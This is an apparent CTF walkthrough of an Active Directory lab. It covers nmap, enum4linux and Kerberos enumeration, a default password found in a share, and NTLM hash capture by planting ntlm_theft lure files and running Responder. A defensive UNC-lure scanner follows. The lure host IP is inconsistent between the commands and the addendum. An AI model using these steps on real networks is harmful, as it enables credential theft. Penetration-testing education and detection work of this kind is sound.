Starting Nmap 7.60 ( https://nmap.org ) at 2024-02-06 13:05 GMT
Nmap scan report for ip-10-10-57-36.eu-west-1.compute.internal (10.10.57.36)
Host is up (0.00050s latency).
Not shown: 988 filtered ports
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Microsoft DNS
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-02-06 13:06:31Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: thm.corp0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: thm.corp0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
3389/tcp open  ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=HayStack.thm.corp
| Not valid before: 2024-01-25T21:01:31
|_Not valid after:  2024-07-26T21:01:31
|_ssl-date: 2024-02-06T13:06:37+00:00; 0s from scanner time.
MAC Address: 02:93:8A:8C:6E:D3 (Unknown)
Service Info: Host: HAYSTACK; OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 77.71 seconds
Add the host to /etc/hosts:
echo 10.10.57.36 HayStack.thm.corp >> /etc/hosts
Scan SMB with enum4linux:
root@ip-10-10-149-226:~# enum4linux 10.10.57.36
WARNING: polenum.py is not in your path.  Check that package is installed and your PATH is sane.
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Tue Feb  6 13:16:15 2024

 ==========================
|    Target Information    |
 ==========================
Target ........... 10.10.57.36
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none

 ===========================================
|    Nbtstat Information for 10.10.57.36    |
 ===========================================
Looking up status of 10.10.57.36
	HAYSTACK        <20> -         B <ACTIVE>  File Server Service
	HAYSTACK        <00> -         B <ACTIVE>  Workstation Service
	THM             <00> - <GROUP> B <ACTIVE>  Domain/Workgroup Name
	THM             <1c> - <GROUP> B <ACTIVE>  Domain Controllers
	THM             <1b> -         B <ACTIVE>  Domain Master Browser

	MAC Address = 02-93-8A-8C-6E-D3

 ====================================
|    Session Check on 10.10.57.36    |
 ====================================
[+] Server 10.10.57.36 allows sessions using username '', password ''

 ==========================================
|    Getting domain SID for 10.10.57.36    |
 ==========================================
Domain Name: THM
Domain Sid: S-1-5-21-1966530601-3185510712-10604624
[+] Host is part of a domain (not a workgroup)

 =====================================
|    OS information on 10.10.57.36    |
 =====================================
Use of uninitialized value $os_info in concatenation (.) or string at /root/Desktop/Tools/Miscellaneous/enum4linux.pl line 464.
[+] Got OS info for 10.10.57.36 from smbclient:
[+] Got OS info for 10.10.57.36 from srvinfo:
Could not initialise srvsvc. Error was NT_STATUS_ACCESS_DENIED

 ============================
|    Users on 10.10.57.36    |
 ============================
[E] Couldn't find users using querydispinfo: NT_STATUS_ACCESS_DENIED

[E] Couldn't find users using enumdomusers: NT_STATUS_ACCESS_DENIED

 ========================================
|    Share Enumeration on 10.10.57.36    |
 ========================================
WARNING: The "syslog" option is deprecated
smb1cli_req_writev_submit: called for dialect[SMB3_11] server[10.10.57.36]

	Sharename       Type      Comment
	---------       ----      -------
Error returning browse list: NT_STATUS_REVISION_MISMATCH
Reconnecting with SMB1 for workgroup listing.
Connection to 10.10.57.36 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Failed to connect with SMB1 -- no workgroup available

[+] Attempting to map shares on 10.10.57.36

 ===================================================
|    Password Policy Information for 10.10.57.36    |
 ===================================================
[E] Dependent program "polenum.py" not present.  Skipping this check.  Download polenum from http://labs.portcullis.co.uk/application/polenum/
 =============================
|    Groups on 10.10.57.36    |
 =============================
[+] Getting builtin groups:
[+] Getting builtin group memberships:
[+] Getting local groups:
[+] Getting local group memberships:
[+] Getting domain groups:
[+] Getting domain group memberships:
 ======================================================================
|    Users on 10.10.57.36 via RID cycling (RIDS: 500-550,1000-1050)    |
 ======================================================================
[E] Couldn't get SID: NT_STATUS_ACCESS_DENIED.  RID cycling not possible.

 ============================================
|    Getting printer info for 10.10.57.36    |
 ============================================
Could not initialise spoolss. Error was NT_STATUS_ACCESS_DENIED
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-02-06 23:22 CST
Nmap scan report for HayStack.thm.corp (10.10.57.36)
Host is up (0.28s latency).

PORT   STATE SERVICE
88/tcp open  kerberos-sec
| krb5-enum-users:
| Discovered Kerberos principals
|     guest@thm.corp
|_    administrator@thm.corp

Nmap done: 1 IP address (1 host up) scanned in 1.53 seconds
This enumerates user accounts through the Kerberos service.
Next, continue enumerating with the guest account:
enum4linux -a -u "guest" 10.10.57.36
Analyze the data.
Download it and take a look:
Subject: Welcome to Reset

Dear <USER>,

Welcome aboard! We are thrilled to have you join our team. As discussed during the hiring process, we are sending you the necessary login information to access your company account. Please keep this information confidential and do not share it with anyone.

The initial password is: ResetMe123!

We are confident that you will contribute significantly to our continued success. We look forward to working with you and wish you the very best in your new role.

Best regards,
The Reset Team

The password.
python ntlm_theft.py -g all -s 10.10.57.36 -f test
sudo responder -I tun0 -v
Then upload all of the generated files to the share with mput *.
Because the user opens the contents of this directory on a schedule, we capture their NTLM hash when they access the files.
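As an added, defender-side example that is not part of the original writeup: every lure file dropped into the share above works by embedding a UNC or file:// reference to an attacker-controlled host, so a check over a share's contents that flags lure-type files pointing at hosts outside an allow-list detects this setup before the scheduled access fires. The extension list, the sample file contents and the allow-list entry for HayStack.thm.corp are the editor's assumptions and constructed data, not output from ntlm_theft.

```python
import re
from pathlib import Path

# File types that Explorer or Office resolve automatically when a folder is listed
# or a file is opened; these are the text-based lure formats NTLM-theft tools emit.
# (Editor's assumption: this list is not taken from the page or from ntlm_theft.)
TEXT_LURE_EXTENSIONS = {".scf", ".url", ".ini", ".m3u", ".htm", ".html", ".rtf", ".xml"}

# Captures the host of a UNC path (\\host\...) or a file:// URL (file://host/...).
UNC_RE = re.compile(r"(?:\\\\|file:/{2,5})([A-Za-z0-9._-]+)[\\/]", re.IGNORECASE)

def unc_hosts(content: str) -> set[str]:
    """Return every host referenced by a UNC or file:// path in the text, lowercased."""
    return {m.group(1).lower() for m in UNC_RE.finditer(content)}

def find_unc_lures(files: dict[str, str], allowed_hosts: set[str]) -> list[tuple[str, str]]:
    """Flag (filename, host) pairs where a lure-type file points at a host outside
    the allow-list. A new file in a writable share that references an unknown IP is
    the signature of the forced-authentication setup described in the writeup."""
    allowed = {h.lower() for h in allowed_hosts}
    hits = []
    for name, content in files.items():
        if Path(name).suffix.lower() not in TEXT_LURE_EXTENSIONS:
            continue
        for host in sorted(unc_hosts(content)):
            if host not in allowed:
                hits.append((name, host))
    return hits

def scan_share(mount_point: str, allowed_hosts: set[str]) -> list[tuple[str, str]]:
    """Read every lure-type file under a mounted share and run the check over them."""
    files = {}
    for p in Path(mount_point).rglob("*"):
        if p.is_file() and p.suffix.lower() in TEXT_LURE_EXTENSIONS:
            files[str(p)] = p.read_text(errors="ignore")
    return find_unc_lures(files, allowed_hosts)

# Constructed sample share contents (not captured from the lab machine); the .scf and
# .url entries mimic the lure layout and point at the attacker IP used on the page.
SAMPLE_SHARE = {
    "test.scf": "[Shell]\r\nCommand=2\r\nIconFile=\\\\10.10.57.36\\test.ico\r\n[Taskbar]\r\nCommand=ToggleDesktop\r\n",
    "test.url": "[InternetShortcut]\r\nURL=file://10.10.57.36/test.html\r\nIconFile=\\\\10.10.57.36\\test.ico\r\n",
    "desktop.ini": "[.ShellClassInfo]\r\nIconResource=\\\\HayStack.thm.corp\\share\\corp.ico\r\n",
    "notes.txt": "see \\\\10.10.57.36\\whatever",
}

if __name__ == "__main__":
    # Only the domain controller's own name is a legitimate UNC target here (assumption).
    for name, host in find_unc_lures(SAMPLE_SHARE, {"haystack.thm.corp"}):
        print(f"suspicious UNC reference in {name}: host {host}")
```

Run scan_share against a mount of the writable share on a schedule tighter than the user's own access, and alert on any hit; the desktop.ini entry pointing at the domain controller shows that legitimate intra-domain references are not flagged.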